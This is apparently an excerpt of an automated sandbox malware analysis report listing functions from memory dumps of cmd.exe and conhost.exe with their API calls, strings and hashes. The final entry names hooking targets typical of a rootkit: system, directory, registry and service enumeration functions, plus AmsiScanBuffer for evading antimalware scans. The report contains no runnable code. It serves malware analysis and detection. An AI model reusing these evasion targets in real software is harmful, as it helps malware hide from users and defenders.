Instruction Fuzzy Hash: 7591DFB2620655A9FF60BFA594583AD3FA0F345BACF444146DE8E6B68DDB34C8E5C300

Function 00000224139428F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000224139428DF), ref: 0000022413942A12

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 1378d3b1fe1f29c3796363717ec6ebce30c9ed187dfa28b51c9cc34399e768c1
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 7791DE32630651A9FF64AFA5D6583AD3FA0B345B8CF444146DE8E5BA8DDA34C4E5C300

Function 0000022413938090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000224139380BC
GetCurrentThreadId.KERNEL32 ref: 00000224139380CA
GetCurrentProcessId.KERNEL32 ref: 00000224139380D6
QueryPerformanceCounter.KERNEL32 ref: 00000224139380E6

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 790c05aa9cc544d3e608751ecb24931b805024f15db756386992ce453d0c1eac
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 0011FE26721F049AEF00DFB0E8593A937A4F759758F441E25EE6D4ABA8DB78C1A4C340

Function 00000224139027E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000224139028CC
StrCpyW.SHLWAPI ref: 00000224139028E5

Part of subcall function 0000022413903F88: StrCmpNIW.SHLWAPI(?,?,?,000002241390272F), ref: 0000022413903FA0

Strings

\\.\pipe\, xrefs: 00000224139028D7

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 2837381cd1c3516549779cc649aad48412e52821d2070d6289c1e516bc1f7ffb
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: B671D876224B8165EF75EFA699883AA7F98F344BC8F540016DD8D5BB8CDE34C9A0C700

Function 00000224139327E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000224139328CC
StrCpyW.SHLWAPI ref: 00000224139328E5

Part of subcall function 0000022413933F88: StrCmpNIW.SHLWAPI(?,?,?,000002241393272F), ref: 0000022413933FA0

Strings

\\.\pipe\, xrefs: 00000224139328D7

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 13a02b1137ed93ea91965a0b178412f59ef6792d8e1452a4d0c8cfdbb5e6d548
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 2071C8B222474162EF34AEB6DA483AA7F95F345788F500016DD8D9BBACDE34C9A0C700

Function 00000224138D80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000224138D80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000224138D8162

Strings

csm, xrefs: 00000224138D8149

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: cff280e3251eff1c2608624c9ae8b8860dd54545dc080a4d5a976f24c8443344
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: AA51B432321A00AADF54EBA9E44CB6D7FE1E354B9CF154125DA4E4B788D778E8E1C700

Function 00000224138D9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000224138D9BA7

Strings

RCC, xrefs: 00000224138D9B77
MOC, xrefs: 00000224138D9B6F

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: cce048554f4d0b4e2e1e2fbad33d5d16701f1ce3b0f1d35305cc441cae5c0a54
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 5E61AF32508BC492EB71AF55E44479ABBE1F785B98F044215EB9C4BB99CB7CE1E0CB00

Function 00000224139025DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000224139026C2
StrCpyW.SHLWAPI ref: 00000224139026D9

Strings

\\.\pipe\, xrefs: 00000224139026CD

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 9e0a546ed7521c8651cb333f3f4ba9560b8cb5827c6b7fb3d3526328628ec222
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 18513A26224780A1EE24FFBDA45C3AA7FA9F384798F540065CD8D5BB8DDE35D4A0C740

Function 00000224139325DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000224139326C2
StrCpyW.SHLWAPI ref: 00000224139326D9

Strings

\\.\pipe\, xrefs: 00000224139326CD

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: beb9c8115fcda13118d4bb4e043656ec6190b80f45fe19bb7273f8be211ce167
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 69515CA622438061EE24FEBDE65C3AA7F61F784B88F040065CD8E4BB6DDE35D4A0C740

Function 0000022413912660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000022413912778
GetLastError.KERNEL32 ref: 000002241391279D

Strings

U, xrefs: 0000022413912722

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 9bd4dd1df9da1b090b21d0887f56619b23c694aeacd54893341cfa2b91bd80cb
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: BA41DA73635A8496EF10FFA5E44879ABBA4F348798F444121EE8D9B75CEB38C891C740

Function 0000022413942660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000022413942778
GetLastError.KERNEL32 ref: 000002241394279D

Strings

U, xrefs: 0000022413942722

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 36b8cff68707d9628293121fe0c1dbf3c3d93edf5e456a2889d7a03b9b792581
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 3A41EA72635B8096EF10EFA9E548799BBA0F348788F404122EE8D8B75CEB38C491C740

Function 0000022413909178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000224139091C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000224139087F7), ref: 0000022413909209

Strings

csm, xrefs: 00000224139091F6

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: a2502da9e4b0420ef9ba5f9ea7c5f89a266a9f96d7b8d6db8c10b0d1bf8ba756
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: A7113032224B4092EF619F15F44825ABBE5F788B98F584220DE8D0B769DF3CC5A1CB00

Function 0000022413939178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000224139391C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000224139387F7), ref: 0000022413939209

Strings

csm, xrefs: 00000224139391F6

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 61ee6502b056ed4271f4d9004b11703078a7d9ccdac39f371625d6ea6e2b4754
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 5D113372614B4092DF119F65F54435ABBE5F788B98F584221DE8D0BB68DF3CC5A1C700

Function 0000022413931D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022413931D69
HeapAlloc.KERNEL32 ref: 0000022413931D77
GetProcessHeap.KERNEL32 ref: 0000022413931D9C
HeapFree.KERNEL32 ref: 0000022413931DAA

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: c6dbe2bbbba02f5c69fdee24eb7ee8ee14999c64b8463b219ee1bf7c5bbfd1e0
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 1B116161621B8095EE14EBA6E50815A7BF0F789FD4F588124DE4E5B779EF38D492C300

Function 0000022413901264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002241390126A
HeapAlloc.KERNEL32 ref: 0000022413901279
GetProcessHeap.KERNEL32 ref: 0000022413901293
HeapAlloc.KERNEL32 ref: 00000224139012A4

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 5c5391555e7210d371c64fbc2eab03c564c34c986135a91487a3b85fd8c60fa5
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: C7E06531611604EAEB559F92D80C34A3AE1FB88F19F49C014CD0D0B354DF7DC8E98740

Function 0000022413931264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002241393126A
HeapAlloc.KERNEL32 ref: 0000022413931279
GetProcessHeap.KERNEL32 ref: 0000022413931293
HeapAlloc.KERNEL32 ref: 00000224139312A4

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 30b20971677f4c2a0e55469442b0ca6c017d8c26b9eec68740c01632917addfa
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 4FE03931621604EAEB14ABA2D80834A3AE1EB8CB49F448024CD090B754EF7DC4E98750

Function 0000022413901000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022413901006
HeapAlloc.KERNEL32 ref: 0000022413901015
GetProcessHeap.KERNEL32 ref: 0000022413901028
HeapAlloc.KERNEL32 ref: 0000022413901037

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 04bf766fac7ba404a30eea39ef6d96916a1e6ee62b1332ae21a5d626d74c529c
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: D0E0ED71621504EAEB59ABA2D80825A7AA1FB88B29F498024CD090B314EF3888E99610

Function 0000022413931000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000022413931006
HeapAlloc.KERNEL32 ref: 0000022413931015
GetProcessHeap.KERNEL32 ref: 0000022413931028
HeapAlloc.KERNEL32 ref: 0000022413931037

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: a17d3cafa6749d258315ce92676b667ecf698181379601acc7b8feff7c1023fe
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: B5E0ED71621504EAEB18ABA2D90825A7AA1FB8CB59F448024CD090B714EE3884E99610

Analysis Process: conhost.exePID: 3192, Parent PID: 1712COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1410
Total number of Limit Nodes:	6

Executed Functions

Function 000002BCD7E31E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002BCD7E31E7F

Part of subcall function 000002BCD7E322A8: GetModuleHandleA.KERNEL32(?,?,?,000002BCD7E31EB1), ref: 000002BCD7E322C0
Part of subcall function 000002BCD7E322A8: GetProcAddress.KERNEL32(?,?,?,000002BCD7E31EB1), ref: 000002BCD7E322D1

CreateThread.KERNELBASE ref: 000002BCD7E32043
TlsAlloc.KERNEL32 ref: 000002BCD7E32049
TlsAlloc.KERNEL32 ref: 000002BCD7E32055
TlsAlloc.KERNEL32 ref: 000002BCD7E32061
TlsAlloc.KERNEL32 ref: 000002BCD7E3206D
TlsAlloc.KERNEL32 ref: 000002BCD7E32079
TlsAlloc.KERNEL32 ref: 000002BCD7E32085

Strings

PdhGetRawCounterArrayW, xrefs: 000002BCD7E31FD0
EnumServiceGroupW, xrefs: 000002BCD7E31F50
NtEnumerateKey, xrefs: 000002BCD7E31F19
amsi.dll, xrefs: 000002BCD7E32019
NtQueryDirectoryFileEx, xrefs: 000002BCD7E31EFC
ntdll.dll, xrefs: 000002BCD7E31E8D
NtQuerySystemInformation, xrefs: 000002BCD7E31EA5
sechost.dll, xrefs: 000002BCD7E31F99
EnumServicesStatusExW, xrefs: 000002BCD7E31F71, 000002BCD7E31F92
advapi32.dll, xrefs: 000002BCD7E31F57, 000002BCD7E31F78
NtDeviceIoControlFile, xrefs: 000002BCD7E31FB6
pdh.dll, xrefs: 000002BCD7E31FD7, 000002BCD7E31FF8
NtQueryDirectoryFile, xrefs: 000002BCD7E31EDF
NtEnumerateValueKey, xrefs: 000002BCD7E31F36
PdhGetFormattedCounterArrayW, xrefs: 000002BCD7E31FF1
AmsiScanBuffer, xrefs: 000002BCD7E32012
NtResumeThread, xrefs: 000002BCD7E31EC2

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: d49f1f6c35ee5c24a4384594b15794368690be238f8a9cb26c282480109bd010
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 94517978510A4BADEB14EB64EC49BD43324A74074AFA0553FD84983E75DF78C26AC383

